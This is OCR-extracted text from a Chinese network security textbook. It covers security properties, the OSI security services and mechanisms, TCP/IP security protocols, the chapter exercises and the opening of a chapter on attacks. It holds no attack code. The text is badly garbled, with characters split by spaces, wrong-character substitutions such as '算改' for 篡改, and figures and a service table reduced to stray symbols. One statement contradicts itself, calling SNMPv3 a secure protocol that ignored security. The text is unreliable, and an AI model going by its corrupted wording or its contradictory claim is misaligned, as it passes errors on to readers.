在 公用 通信 网络 中 传输 、 交 换 和 存储 的 信息 的 机 密 性 、 完 整 性 和 真实 性 ,并 对 信息 的 传播 及 
内 容 有 控制 能 力 。 

在 正常 情况 下 ,信息 在 网 络 中 安全 地 进行 传输 ,如 图 1. 3 所 示 , 源 节点 发 出 的 信息 通过 
网 络 信道 传输 到 目标 节点 。 








源 节点 





1.3 信息 在 网 络 中 的 正常 传输 


考虑 到 种 种 不 安全 的 因素 ,信息 在 网 络 上 传递 的 过 程 中 可 能 会 遇 到 被 中 断 、 截 取 、 算 改 
和 伪造 等 情况 ,如 图 1. 4 所 示 。 


本 ”图 加 下 一 加 
各 


























(a) 中 断 (b) 截取 
本 一 一 癌 园 让 一 赂 
(0) 臭 改 (d) 伪造 


图 1.4 信息 在 传递 过 程 中 被 中 断 、 截 取 、 自 改 、 伪 造 
因此 ,考虑 到 以 上 这 些 情 况 ,计算 机 网 络 安全 的 特征 主要 表现 在 系统 的 保密 性 真实 性 、 


完整 性 、 可 靠 性 、 可 用 性 \ 不 可 否认 性 、 可 控 性 等 方面 。 
网 络 上 传输 的 信息 被 中 断 、 截 取 、 修 改 或 者 伪造 都 会 影响 信息 的 可 用 性 、 机 密 性 、 完 整 性 
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和 真实 性 ,如 图 1.5 所 示 。 


中 断 Availability 可 用 性 


截取 Confidentiality 机 密 性 


Integrity 


图 1.5 各 种 行为 对 网 络 上 传输 信息 的 影响 
1. 保密 性 
保密 性 是 指 网 络 信息 不 被 泄露 给 非 授 权 的 用 户 、 实 体 或 过 程 , 即 信息 只 被 授权 用 户 使 
用 。 保 密 性 是 在 可 靠 性 和 可 用 性 基础 之 上 保障 网 络 信息 安全 的 重要 属性 。 

常用 的 保密 技术 包括 : 

”物理 保密 。 利 用 各 种 物理 方法 ,如 限制 隔离 掩蔽、 控制 等 措施 ,保护 信息 不 被 
泄露 。 

。 防 窃听 。 使 对 手 侦 收 不 到 有 用 的 信息 。 

。 防 辐射 。 防 止 有 用 信息 以 各 种 途径 辐射 出 去 。 

。 信 息 加 密 。 在 密 钥 的 控制 下 ,用 加 密 算法 对 信息 进行 加 密 处 理 。 即 使 对 手 得 到 了 加 
密 后 的 信息 ,也 会 因为 没有 密 钥 而 无 法 获取 有 效 信息 。 

2. 真实 性 


真实 性 是 指 用 户 的 身份 是 真实 的 。 例 如 在 一 个 大 型 的 电子 商务 网 络 内 ,用 户 张 三 声明 
他 是 张 三 , 但 是 网 络 能 够 相信 他 吗 ? 会 不 会 是 李 四 骨 充 张 三 呢 ? 因此 ,如 何 能 对 通信 实体 身 
份 的 真实 性 进行 鉴别 ? 如 何 保证 用 户 的 身份 不 会 被 别人 冒充 ? 这 是 真实 性 所 需要 解决 的 
问题 。 

3. 完整 性 

完整 性 是 网 络 信息 未 经 授权 不 能 被 改变 的 特性 , 即 网 络 信息 在 存储 或 传输 过 程 中 保持 
不 被 偶然 或 蓄意 地 添加 、 删 除 .修改 、 伪 造 、 乱 序 、 重 放 等 破坏 和 丢失 的 特性 。 完 整 性 是 一 种 
面向 信息 的 安全 性 ,要 求 保持 信息 的 原样 , 即 信 息 的 正确 生成 .正确 存储 和 正确 传输 。 

完整 性 与 保密 性 不 同 ,保密 性 要 求 信息 不 被 泄露 给 未 授权 的 人 ,而 完整 性 则 要 求 信 息 不 
致 受到 各 种 原因 的 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 设备 故障 、 误 码 ( 传 输 、 处 理 和 
存储 过 程 中 产生 的 误 码 ,各 种 干扰 源 造成 的 误 码 )、 人 为 攻击 ,计算 机 病毒 等 。 

保障 网 络 信息 完整 性 的 主要 方法 有 : 

。 良 好 的 协议 。 通 过 各 种 安全 协议 可 以 有 效 地 检测 出 被 复制 的 信息 、 被 删除 的 字段、 

失效 的 字段 和 被 修改 的 字段 。 
。 密码 校 验 和 方法 。 它 是 抗 自 改 和 传输 失败 的 重要 手段 。 
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。 数字 签名 。 保 障 信息 的 真实 性 ,保证 信息 的 不 可 否认 性 。 

。 公证。 请 求 网 络 管理 或 中 介 机 构 证 明 信 息 来 源 者 身份 的 真实 性 。 

4. 可 靠 性 

可 靠 性 是 指 系统 能 够 在 规定 的 条 件 和 规定 的 时 间 内 完成 规定 的 功能 的 特性 。 可 靠 性 是 
系统 安全 最 基础 的 要 求 之 一 ,是 所 有 网 络 信息 系统 的 建设 和 运行 的 基本 目标 。 

衡量 网 络 信息 系统 的 可 靠 性 主要 有 3 方面: 

(1) 抗 毁 性 。 是 指 系统 在 人 为 破坏 下 的 可 靠 性 。 例 如 ,部 分 线路 或 节点 失效 后 ,系统 是 
和 否 仍然 能 够 提供 一 定 程 度 的 服务 。 增 强 抗 毁 性 可 以 有 效 地 避免 因 各 种 灾害 (战争 .地 震 等 ) 
造成 的 大 面积 网 络 瘫痪 事件 。 

(2) 生存 性 。 是 在 随机 破坏 下 系统 的 可 靠 性 。 生 存 性 主要 反映 随机 性 破坏 和 网 络 拓扑 
结构 对 系统 可 靠 性 的 影响 。 这 里 ,随机 性 破坏 是 指 系统 部 件 因为 自然 老化 等 原因 造成 的 自 

(3) 有 效 性 。 是 一 种 基于 业务 性 能 的 可 靠 性 。 有 效 性 主要 反映 在 网 络 信 息 系统 的 部 件 
失效 情况 下 满足 业务 性 能 要 求 的 程度 。 例 如 ,网 络 部 件 失效 虽然 没有 引起 连接 性 故障 ,但 是 
却 造成 通信 质量 指标 下 降 .平均 延 时 增加 、 线 路 阻塞 等 现象 。 

可 靠 性 主要 表现 在 硬件 可 靠 性 、 软 件 可 靠 性 .人 员 可 靠 性 .环境 可 靠 性 等 方面 。 硬 件 可 
靠 性 最 为 直观 和 常见 。 软 件 可 靠 性 是 指 在 规定 的 时 间 内 程序 成 功 运行 的 概率 。 人 员 可 靠 性 
是 指 人 员 成 功 地 完成 工作 或 任务 的 概率 。 人 员 可 靠 性 在 整个 系统 可 靠 性 中 扮演 重要 角色 ， 
因为 系统 失效 大 部 分 是 人 为 差错 造成 的 。 人 的 行为 要 受到 生理 和 心理 的 影响 ,受到 其 技术 
熟练 程度 责任 心 和 品德 等 素质 方面 的 影响 。 因 此 ,人 员 的 教育 .培养 .训练 和 管理 以 及 合理 
的 人 机 界面 是 提高 可 靠 性 的 重要 方面 。 环 境 可 靠 性 是 指 在 规定 的 环境 内 保证 网 络 成 功 运行 
的 概率 。 

5. 可 用 性 

通俗 而 言 , 可 用 性 是 指 当 用 户 需要 使 用 网 络 时 ,网 络 能 够 及 时 地 提供 服务 。 

可 用 性 是 网 络 信息 服务 在 被 需要 时 ,可 被 授权 用 户 或 实体 访问 并 按 需 求 使 用 的 特性 ,或 
者 是 网 络 部 分 受 损 或 需要 降级 使 用 时 , 仍 能 为 授权 用 户 提 供 有 效 服务 的 特性 。 可 用 性 是 网 
络 信息 系统 面向 用 户 的 安全 性 能 。 网 络 信息 系统 最 基本 的 功能 是 向 用 户 提供 服务 ,而 用 户 
的 需求 是 随机 的 、 多 方面 的 ,有 时 还 有 时 间 要 求 。 可 用 性 一 般 用 系统 正常 使 用 时 间 和 整个 工 
作 时 间 之 比 来 度量 。 

可 用 性 通过 以 下 手段 来 保证 : 

。 身份 识别 与 确认 。 一 般 通 过 用 户 名 和 密码 进行 识别 与 确认 。 

。 访问 控制 。 对 用 户 的 权限 进行 控制 ,使 其 只 能 访问 相应 权限 的 资源 ,防止 或 限制 经 

隐蔽 通道 的 非法 访问 。 
。 业务 流 控制 。 利 用 负载 均衡 的 方法 ,防止 业务 流量 过 度 集中 而 引起 网 络 阻塞 。 例 
如 ,大 型 的 ISP(Internet Service Provider, 网 络 服务 提供 者 ) 提 供 的 电子 邮件 服务 一 
般 都 有 几 个 邮件 服务 器 进行 负载 均衡 。 

。 路 由 选择 控制 。 选 择 那些 稳定 可 靠 的 子 网 .中 继 线 或 链 路 等 。 

。 审计 跟踪 。 把 网 络 信息 系统 中 发 生 的 所 有 安全 事件 情况 存储 在 安全 审计 跟踪 之 中 ， 
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以 便 能 够 根据 日 志 分 析 原 因 ,分 清 责任 ,并 且 及 时 采取 相应 的 措施 。 当 然 ,通过 平时 
对 日 志 的 分 析 , 也 能 够 判断 是 否 有 非法 用 户 尝试 入 侵 网 卡 ,便于 系统 管理 员 及 时 采 
取 防 范 措施 。 所 以 ,良好 的 审计 跟踪 系统 能 够 起 到 事前 预防 .事后 跟踪 的 作用 。 

6. 不 可 否认 性 

不 可 否认 性 也 称 作 不 可 抵赖 性 。 例 如 ,在 网 络 系 统 中 ,考虑 以 下 几 种 情况 : 

。 A 明明 给 B 发 了 一 串 信 息 , 但 A 否认 给 B 发 过 信息 。 

。B 明 明 收 到 了 A 发 送 的 信息 ,但 是 B 否认 收 到 。 

。C 骨 充 A 给 B 发 了 一 串 信 息 。 

这 些 行为 实际 上 是 不 允许 的 ,为 了 防止 这 些 情 况 的 出 现 ,在 网 络 信息 系统 的 信息 交互 过 
程 中 ,就 要 确认 参与 者 的 真实 同一 性 。 所 有 参与 者 都 不 可 能 否认 或 抵赖 曾经 完成 的 操作 和 
承诺 。 利 用 信息 源 证 据 可 以 防止 发 信 方 否认 已 发 送信 息 , 利 用 递交 接收 证 据 可 以 防止 收 信 
方 事后 否认 已 经 接收 的 信息 。 数 字 签 名 技术 是 解决 不 可 否认 性 的 手段 之 一 。 

7. 可 控 性 

可 控 性 是 对 网 络 信息 的 传播 及 内 容 具 有 控制 能 力 的 特性 。 不 允许 不 良 内 容 通过 公共 网 
络 进行 传输 。 


1.4 网 络 安全 模型 结构 


1.4.1 OSI 安全 服务 的 层次 模型 


ISO/OSI 定义 的 计算 机 网 络 体系 结构 共 分 为 7 层 , 即 应 用 层 、. 表 示 层 、 会 话 层 、 传 输 层 、 
网 络 层 ,数据 链 路 层 和 物理 层 。 为 了 适应 网 络 安全 技术 的 发 展 ,国际 标准 化 组 织 (ISO) 的 计 
算 机 专业 委员 会 根据 开放 系统 互联 参考 模型 (OSID) 制定 了 一 个 网 络 安全 体系 结构 ,包括 安 
全 服务 和 安全 机 制 。 该 模型 主要 解决 网 络 信息 系统 中 的 安全 与 保密 问题 ,与 原 有 的 OSI 七 
层 模 型 相对 应 ,在 每 个 层次 增加 了 安全 服务 和 机 制 , 如 图 1. 6 所 示 。 

1.4.2 OSI 安全 服务 


针对 网 络 系统 受到 的 威胁 ,OSI 安全 体系 结构 要 求 以 下 6 种 安全 服务 。 

1. 对 等 实体 鉴别 服务 

对 等 实体 鉴别 服务 是 在 开放 系统 同等 层 中 的 两 个 实体 之 间 建 立 连 接 和 数据 传送 期 间 ， 
为 提供 连接 实体 身份 的 鉴别 而 规定 的 一 种 服务 。 这 种 服务 防止 假冒 或 重 放 以 前 的 连接 , 即 
防止 伪造 连接 初始 化 这 种 类 型 的 攻击 。 这 种 鉴别 服务 可 以 是 单 向 的 ,也 可 以 是 双向 的 。 

2. 访问 控制 服务 

访问 控制 服务 可 以 防止 未 经 授权 的 用 户 非法 使 用 系统 资源 。 这 种 服务 不 仅 可 以 提供 给 
单个 用 户 , 也 可 以 提供 给 封闭 的 用 户 组 中 的 所 有 用 户 。 

3. 数据 保密 服务 

数据 保密 服务 保护 网 络 中 各 系统 之 间 交 换 的 数据 ,防止 因数 据 被 截获 而 造成 的 泄密 。 
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身份 认证 
应 有 里 一 一 | 应 用 层 | 访问 控制 
数据 保密 








表示 层 “| 一 一 > 表示 层 数据 完整 性 








传输 层 。 一 一 > 传输 层 端 到 端的 加 密 





网 络 层 == | 网 络 层 防火 墙 ，IP 加 密 信道 





数据 链 路 层 “一 |] 数据 链 路 层 。 | 点 到 点 链 路 加 密 











物理 层 | | 物理 层 安全 物理 信道 


互 连 的 物理 介质 


1.6 安全 服务 的 层次 模型 











具体 包括 : 
。 连接 保密 。 即 对 某 个 连接 上 的 所 有 用 户 数据 提供 保密 。 
。 无 连接 保密 。 即 对 一 个 无 连接 的 数据 报 的 所 有 用 户 数据 提供 保密 。 
。 选择 字段 保密 。 即 对 一 个 协议 数据 单元 中 用 户 数据 的 一 些 经 过 选择 的 字段 提供 保密 。 


4. 


信息 流 安全 。 即 对 可 能 通过 观察 信息 流 就 能 推导 出 的 信息 提供 保密 。 
数据 完整 性 服务 


数据 完整 性 服务 防止 非法 实体 (用 户 ) 的 主动 攻击 (如 对 正在 交换 的 数据 进行 修改 、 插 
入 ,使 数据 延 时 以 及 丢失 数据 等 ), 以 保证 数据 接收 方 收 到 的 信息 与 发 送 方 发 送 的 信息 完全 
一 致 。 具 体 包括 : 


5. 


可 恢复 的 连接 完整 性 。 该 服务 对 一 个 连接 上 的 所 有 用 户 数 据 的 完整 性 提供 保障 ,而 
且 对 任何 服务 数据 单元 的 修改 、 插 入 、 删 除 或 重 放 都 可 使 之 复原 。 

无 恢复 的 连接 完整 性 。 该 服务 除了 不 具备 恢复 功能 之 外 ,其 余 同 前 。 

选择 字段 的 连接 完整 性 。 该 服务 提供 在 连接 上 传送 的 选择 字段 的 完整 性 ,并 能 确定 
所 选 字段 是 否 已 被 修改 、 插 入、 删除 或 重 放 。 

无 连接 完整 性 。 该 服务 提供 单个 无 连接 的 数据 单元 的 完整 性 ,能 确定 收 到 的 数据 单 
元 是 否 已 被 修改 。 

选择 字段 无 连接 完整 性 。 该 服务 提供 单个 无 连接 数据 单元 中 各 个 选择 字段 的 完整 
性 ,能 确定 选择 字段 是 否 被 修改 。 

数据 源 鉴别 服务 


这 是 某 一 层 向 上 一 层 提供 的 服务 , 它 用 来 确保 数据 是 由 合法 实体 发 出 的 , 它 为 上 一 层 提 
供 对 数据 源 的 对 等 实体 进行 鉴别 的 服务 ,以 防 假冒 。 
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6. 禁止 否认 服务 
禁止 否认 服务 防止 发 送 方 发 送 数据 后 否认 自己 发 送 过 数据 ,或 接收 方 接收 数据 后 否认 
自己 收 到 过 数据 。 该 服务 由 以 下 两 种 服务 组 成 : 
。 不 得 否认 发 送 。 这 种 服务 向 数据 接收 者 提供 数据 源 的 证 据 , 从 而 可 防止 发 送 者 否认 
发 送 过 这 个 数据 。 
。 不 得 否认 接收 。 这 种 服务 向 数据 发 送 者 提供 数据 已 交付 给 接收 者 的 证 据 , 因 而 接收 
者 事后 不 能 否认 曾 收 到 此 数据 。 


1.4.3 OSI 安全 机 制 


为 了 实现 上 述 各 种 OSI 安全 服务 ,OSI 建议 了 以 下 8 种 安全 机 制 。 

1. 加 密 机 制 

加 密 是 提供 数据 保密 的 最 常用 方法 。 加 密 算 法 按 密 钥 类 型 ,可 分 为 对 称 密 钥 和 非 对 称 
密 钥 两 种 , 按 密码 体制 可 分 为 序列 密码 和 分 组 密码 算法 两 种 。 将 加 密 的 方法 与 其 他 技术 相 
结合 ,可 以 提供 数据 的 保密 性 和 完整 性 。 除 了 会 话 层 不 提供 加 密 保 护 外 ,加 密 可 在 其 他 各 层 
上 进行 。 伴 随 加 密 机 制 而 来 的 是 密 钥 管理 机 制 。 

2. 数字 签名 机 制 

数字 签名 是 解决 网 络 通信 中 特有 的 安全 问题 的 有 效 方法 ,特别 是 针对 通信 双方 发 生 争 
执 时 可 能 产生 的 如 下 安全 问题 : 

。 和 否认。 发 送 者 事后 不 承认 自己 发 送 过 某 份 文件 。 

。 伪造。 接收 者 伪造 一 份 文件 ,声称 它 发 自发 送 者 。 

。 冒充 。 网 上 的 某 个 用 户 冒 充 另 一 个 用 户 接收 或 发 送信 息 。 

。 算 改 。 接 收 者 对 收 到 的 信息 进行 部 分 自 改 。 

3. 访问 控制 机 制 

访问 控制 是 按 事先 确定 的 规则 决定 主体 对 客体 的 访问 是 否 合法 。 当 一 个 主体 试图 非法 
使 用 一 个 未 经 授权 使 用 的 客体 时 ,该 机 制 将 拒绝 这 一 企图 ,并 附带 向 审计 跟踪 系统 报告 这 一 
事件 。 审 计 跟 踪 系 统 将 产生 报警 信号 或 形成 部 分 追踪 审计 信息 。 

4. 数据 完整 性 机 制 

数据 完整 性 包括 两 种 形式 : 一 种 是 数据 单元 的 完整 性 , 另 一 种 是 数据 单元 序列 的 完整 
性 。 数 据 单元 完整 性 包括 两 个 过 程 ,一 个 过 程 发 生 在 发 送 实 体 , 另 一 个 过 程 发 生 在 接收 实 
体 。 保 证 数据 完整 性 的 一 般 方法 是 : 发 送 实体 在 一 个 数据 单元 上 加 一 个 标记 ,这 个 标记 是 数 
据 本 身 的 函数 ,如 一 个 分 组 校 验 或 密码 校 验 函数 , 它 本 身 是 经 过 加 密 的 。 接 收 实体 是 一 个 对 应 
的 标记 ,并 将 所 产生 的 标记 与 接收 的 标记 相 比 较 , 以 确定 在 传输 过 程 中 数据 是 否 被 修改 过 。 

数据 单元 序列 的 完整 性 是 要 求 数据 编号 的 连续 性 和 时 间 标 记 的 正确 性 ,以 防止 假冒 . 丢 
失 、 重 发 .插入 或 修改 数据 。 

5. 交换 鉴别 机 制 

交换 鉴别 是 以 交换 信息 的 方式 来 确认 实体 身份 的 机 制 。 用 于 交换 鉴别 的 技术 有 : 

。 口 令 。 由 发 送 方 实体 提供 ,接收 方 实体 检测 。 
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。 密码 技术 。 将 交换 的 数据 加 密 , 只 有 合法 用 户 才能 解密 ,得 出 有 意义 的 明文 。 在 许 
多 情况 下 ,这 种 技术 与 下 列 技术 一 起 使 用 : 时 间 标 记 和 同步 时 钟 、 双 方 或 三 方 “ 握 
手 ” 数 字 签 名 和 公证 机 构 。 
。 利用 实体 的 特征 或 所 有 权 : 采用 的 技术 是 指纹 识别 和 身份 卡 等 。 
6. 业务 流量 填充 机 制 
这 种 机 制 主要 是 对 抗 非法 者 在 线路 上 监听 数据 并 对 其 进行 流量 和 流向 分 析 。 采 用 的 方 
法 是 : 一 般 由 保密 装置 在 无 信息 传输 时 连续 发 出 伪 随 机 序列 ,使 得 非法 者 不 知 哪些 是 有 用 
信息 ,哪些 是 无 用 信息 。 
7. 路 由 控制 机 制 
在 一 个 大 型 网 络 中 ,从 源 节点 到 目的 节点 可 能 有 多 条 线路 ,有 些 线路 可 能 是 安全 的 ,而 
另 一 些 线路 是 不 安全 的 。 路 由 控制 机 制 可 使 信息 发 送 者 选择 特殊 的 路 由 ,以 保证 数据 安全 。 
8. 公证 机 制 
在 一 个 大 型 网 络 中 ,有 许多 节点 或 端 节点 。 在 使 用 这 个 网 络 时 ,并 不 是 所 有 用 户 都 是 诚 
实 的 、 可 信和 的 ,同时 也 可 能 由 于 系统 故障 等 原因 使 信息 丢失 、 延 迟 等 ,这 很 可 能 引起 责任 问 
题 。 为 了 解决 这 个 问题 ,就 需要 有 一 个 各 方 都 信任 的 实体 一 一 公证 机 构 ,如 同一 个 国家 设立 
的 公证 机 构 一 样 , 提 供 公 证 服务 ,仲裁 出 现 的 问题 。 
一 旦 引入 公证 机 制 ,通信 双方 进行 数据 通信 时 必须 经 过 这 个 机 构 来 转换 ,以 确保 公证 机 
构 能 得 到 必要 的 信息 , 供 以 后 仲裁 。 


1.4.4 OSI 安全 服务 的 层 配置 
OSI 各 层 与 服务 的 对 应 关系 如 表 1. 1 所 示 。 
表 1.1 安全 服务 的 层次 配置 对 照 表 





安全 服务 物理 层 ”数据 链 路 层 网络 层 。 传输 层 会话 层 。 表示 层 ”应 用 层 
对 等 实体 认证 服务 V/ V ~ V/ 
访问 控制 服务 V/ Vv ~V JV 
连接 保密 ~V JV Vv V V 
无 连接 保密 ~V JV Vv V V 
选择 字段 保密 V V 
信息 流 安全 V/ V NA 
可 恢复 的 连接 完整 性 V/ V 
无 恢复 的 连接 完整 性 Nh Vv Nh 
选择 字段 的 连接 完整 性 V V/ 
无 连接 完整 性 Sh Nh 
数据 源 点 鉴别 JV Sh Sh Nh 
不 得 否认 (发 送 方 ) Sh V 
不 得 否认 (接收 方 ) JV JV 
其 中 : 


。 物理 层 只 支持 数据 保密 服务 ,保证 信息 流 安 全 。 
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数据 链 路 层 只 支持 数据 保密 服务 ,实现 链 路 层 的 面向 连接 和 无 连接 两 种 服务 的 
加 密 。 

网 络 层 和 传输 层 提 供 对 等 实体 认证 服务 .访问 控制 服务 .数据 保密 服务 .数据 完整 性 
服务 .数据 源 点 鉴别 服务 等 。 

会 话 层 不 提供 安全 服务 。 

表示 层 除 信息 流 安 全 服务 .可 恢复 的 连接 完整 性 和 无 恢复 的 连接 完整 性 之 外 所 有 其 
他 服务 。 

应 用 层 原 则 上 能 够 支持 所 有 安全 服务 。 


1.4.5 ”TCP/IP 安全 服务 模型 


相对 于 ISO/OSI 的 网 络 安全 体系 结构 ,TCP/IP 的 安全 体系 结构 有 点 类 似 打 补 丁 。 
TCP/IP 刚 开 始 出 现时 ,主要 在 大 学 、 研 究 所 和 政府 机 构 使 用 。 协 议 设计 者 认为 大 家 都 是 君 
子 , 因 此 对 网 络 安全 方面 考虑 较 少 。 

随 着 Internet 的 快速 发 展 , 越 来 越 多 的 人 开始 使 用 TCP/IP。 因 此 , 它 的 各 种 安全 脆弱 
性 逐步 显现 。 但 是 ,目前 又 不 能 设计 一 种 全 新 的 协议 来 取代 TCP/IP, 因 为 TCP/IP 的 用 户 
数量 非常 庞大 ,事实 上 已 成 为 通用 的 工业 标准 ,很 难 将 其 推翻 。 因 此 ,TCP/IP 的 安全 体 协 
结构 是 在 各 个 层次 加 上 相应 的 安全 协议 ,如 图 1.7 所 示 。 
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图 1.7 TCP/IP 安全 体系 结构 


TCP/IP 各 层 安全 服务 的 特性 如 表 1. 2 所 示 。 


层次 安全 协议 


表 1.2 TCP/IP 各 层 安 全 服务 特性 
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IPSec 协议 不 是 一 个 单独 的 协议 , 它 给 出 了 应 用 于 IP 层 上 网 络 数据 安全 的 一 整套 体系 
结构 ,包括 网 络 认 证 协议 Authentication Header(AH)、 封 装 安 全 载荷 协议 Encapsulating 
Security Payload(ESP) 、 密 钥 管理 协议 Internet Key Exchange (IKE) 和 用 于 网 络 认证 及 加 
密 的 一 些 算法 等 。IPSec 规定 了 如 何在 对 等 层 之 间 选 择 安全 协议 ,确定 安全 算法 和 密 钥 交 
换 , 向 上 提供 了 访问 控制 ,数据 源 认证 ,数据 加 密 等 网 络 安全 服务 。 

SSL(Secure Sockets Layer, 安 全 套 接 层 ) 及 其 继任 者 TLS(Transport Layer Security， 
传输 层 安 全 ) 是 为 网 络 通信 提供 安全 及 数据 完整 性 的 一 种 安全 协议 。TLS 与 SSL 在 传输 层 
对 网 络 连接 进行 加 密 。 

PEM(Privacy Enhanced Mail, 私 密 性 增强 邮件 ) 是 由 IRTF 安全 研究 小 组 设计 的 邮件 
保密 与 增强 规范 , 它 的 实现 基于 PKI( 公 钥 基 础 结构 ) 并 遵循 X. 509 认证 协议 。PEM 提供 
了 数据 加 密 ,鉴别 消息 完整 性 及 密 钥 管 理 等 功能 ,对 于 每 个 电子 邮件 报 文 , 可 以 在 报 文 头 中 
规定 特定 的 加 密 算法 .数字 鉴别 算法 、 散 列 功能 等 安全 措施 。 目 前 基于 PEM 的 具体 实现 有 
TIS/PEM、RIPEM、MSP 等 多 种 软件 模型 。 但 是 ,PEM 是 通过 Internet 传输 安全 性 商务 邮 
件 的 非 正 式 标 准 , 有 可 能 被 S/MIME 和 PEM-MIME 规范 所 取代 。 

MOSS(MIME Object Security Services, MIME 对 象 安全 服务 ) 是 一 个 执行 端 到 端 加 密 
和 数字 签名 到 MIME 信息 内 容 的 电子 邮件 安全 方案 ,使 用 对 称 密码 进行 加 密 和 不 对 称 密码 
进行 密 钥 分 发 和 签名 。MOSS 从 未 被 大 范围 执行 过 。 

S/MIME(Secure Multipurpose Internet Mail Extensions ,安全 的 多 用 途 网 际 邮 件 扩充 
协议 ) 在 安全 方面 的 功能 又 有 了 扩展 , 它 可 以 把 MIME 实体 (例如 数字 签名 和 加 密 信 息 等 ) 
封装 成 安全 对 象 。 

PGP(Pretty Good Privacy, 可 以 翻译 为 “相当 好 的 隐私 ”) 是 一 个 基于 RSA 公 钥 加 密 体 
系 的 邮件 加 密 软件 。 可 以 用 它 对 邮件 保密 以 防止 非 授 权 者 阅读 。 它 还 能 对 邮件 加 上 数字 签 
名 ,从 而 使 收 信 人 可 以 确认 邮件 的 发 送 者 ,并 能 确信 邮件 没有 被 算 改 。 它 可 以 提供 一 种 安全 
的 通信 方式 ,而 事先 并 不 需要 任何 保密 的 渠道 用 来 传递 密 钥 。 它 采用 了 一 种 RSA 和 传统 加 
密 的 杂 合算 法 ,用 于 数字 签名 的 邮件 文摘 算法 、 加 密 前 压缩 等 。 

SHTTP 协议 (Secure HyperText Transfer Protocal, 安 全 超 文 本 传输 协议 ) 是 一 种 结合 
HTTP 而 设计 的 消息 的 安全 通信 协议 。SHTTP 协议 为 HTTP 客户 机 和 服务 器 提供 了 多 
种 安全 机 制 ,这 些 安全 服务 选项 是 适用 于 WWW 上 的 各 类 用 户 。 

SNMP v3 是 一 种 安全 的 网 络 管理 协议 ,没有 考虑 安全 问题 。 

SSH(Secure Shell, 安 全 shell) 是 建立 在 应 用 层 和 传输 层 基 础 上 的 安全 协议 。SSH 是 
目前 较 可 靠 , 专 为 远程 登录 会 话 和 其 他 网 络 服务 提供 安全 性 的 协议 。 利 用 SSH 协议 可 以 有 
效 防止 远程 管理 过 程 中 的 信息 泄露 问题 。 

Kerberos 是 一 种 网 络 认证 协议 ,其 设计 目标 是 通过 密 钥 系统 为 客户 机 /服务 器 应 用 程 
序 提供 强大 的 认证 服务 。 该 认证 过 程 的 实现 不 依赖 于 主机 操作 系统 的 认证 ,无 需 基于 主机 
地 址 的 信任 ,不 要 求 网 络 上 所 有 主机 的 物理 安全 ,并 假定 网 络 上 传送 的 数据 包 可 以 被 任意 地 
读 取 、 修 改 和 插入 数据 。 在 以 上 情况 下 ,Kerberos 作为 一 种 可 信任 的 第 三 方 认证 服务 ,是 通 
过 传统 的 密码 技术 (如 共享 密 钥 ) 执 行 认证 服务 的 。 

后 续 章 节 中 将 逐步 介绍 这 些 安全 协议 。 
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1.5 本 章 小 结 


随 着 Internet 的 快速 发 展 和 壮大 ,各 种 Internet 应 用 都 需要 借助 计算 机 网 络 来 进行 传 
输 , 计 算 机 网 络 已 经 成 为 社会 基础 设施 的 一 部 分 。 如 果 基 础 出 现 安全 问题 ,那么 上 层 应 用 的 
准确 性 、 安 全 性 将 根本 无 法 得 到 保障 。 因 此 ,网 络 安全 问题 越 来 越 突出 。 

本 章 主要 介绍 网 络 安全 的 基础 知识 。 以 两 个 典型 的 网 络 安全 案例 引出 网 络 安全 问题 的 
重要 性 ; 列举 了 目前 常见 的 计算 机 网 络 安全 的 威胁 ,提出 网 络 安 全 的 概念 ; 以 ISO/OSI 安 
全 体系 结构 为 模型 ,分 析 了 安全 服务 和 实现 机 制 ; 最 后 介绍 了 Internet 的 主流 协议 一 
TCP/IP 的 安全 服务 模型 。 


1.6 本 章 习 题 


1. 什么 是 网 络 体系 结构 ? 比较 ISO/OSI 和 TCP/IP 这 两 个 标准 。 
2. 什么 是 计算 机 网 络 安 全 ? 分 析 网 络 安 全 的 特征 。 
3. 路 由 器 是 一 种 常用 的 网 络 互联 产品 , 某 单位 购买 了 一 台 路 由 器 ,但 是 该 单位 没有 专 
业 维 护 人 员 , 于 是 厂家 就 通过 路 由 器 的 内 部 端口 进行 远程 维护 。 请 讨论 这 种 行为 的 安全 性 ， 
并 分 析 其 优 缺点 。 
. 简 述 OSI 安全 体系 结构 要 求 的 安全 服务 及 其 安全 机 制 。 
. 查阅 有 关 资 料 ,分析 TCP/IP 网 络 层 、 传 输 层 和 应 用 层 的 安全 缺陷 。 
. 在 计算 机 网 络 安全 特征 中 ,如 何 保证 用 户 的 真实 性 ? 
. TCP/IP 存在 各 种 安全 问题 ,为 什么 还 是 目前 使 用 的 主流 标准 呢 ? 
. 简 述 “棱镜 门 事 件 折射 出 的 我 国 目前 网 络 安全 面临 的 主要 威胁 。 
. 简 述 TCP/IP 中 各 层次 中 分 别 包含 哪些 安全 协议 。 


Do 


第 2 章 和 见 的 网 络 攻击 技术 


越 来 越 多 的 人 使 用 Internet 提供 的 服务 ,但 并 不 是 所 有 的 人 都 循规蹈矩 ,经常 有 一 小 部 
分 “ 离 经 叛 道 ”者 或 者 利用 网 络 协议 本 身 的 缺陷 ,或 者 利用 一 些 应 用 系统 的 漏洞 ,通过 网 络 进 
行 各 种 攻击 。 为 了 对 这 些 攻 击 进行 防范 ,首先 必须 搞 清楚 哪些 是 常用 的 攻击 技术 ,这 些 攻 击 
技术 的 基本 工作 原理 是 什么 。 通 过 对 这 些 攻击 技术 的 了 解 ,我 们 才能 知己 知 彼 , 进 行 更 好 的 
防范 。 

本 章 主 要 内 容 : 

。 网 络 攻击 

。 数据 链 路 层 攻击 技术 

。 网 络 层 攻击 技术 

。 传输 层 攻击 技术 

。 应 用 层 攻 击 技术 

。 网 络 病毒 与 木马 

。 拒 绝 服务 攻击 


2.1 网 络 攻 击 


计算 机 与 通信 技术 的 高 速 发 展 促进 了 Internet 在 全 球 的 普及 ,中 国 互联 网 也 在 短 短 二 
十 多 年 里 经 历 了 飞速 成 长 ,通过 以 下 数据 可 以 看 出 Internet 是 历史 上 发 展 最 快 的 技术 : 
。 比较 一 项 技术 自 商业 化 起 到 拥有 5000 万 用 户 所 经 历 的 时 间 一 一 收音 机 是 38 年 , 电 
视 是 13 年 ,Internet 仅仅 用 了 4 年 。 
。 根据 中 国 互 联网 络 信息 中 心 于 2017 年 1 月 发 布 的 (第 39 次 中 国 互 联网 发 展 状况 统 
计 报 告 》: 截至 2016 年 12 月 ,我 国 的 网 民 总 数 达 到 7. 31 亿 , 相 当 于 欧洲 的 人 口 总 
量 ; 互联 网 普及 率 为 53.2%; 手机 网 民 达 到 6. 95 亿 , 农 村 网 民有 2. 01 亿 ( 占 中 国 网 
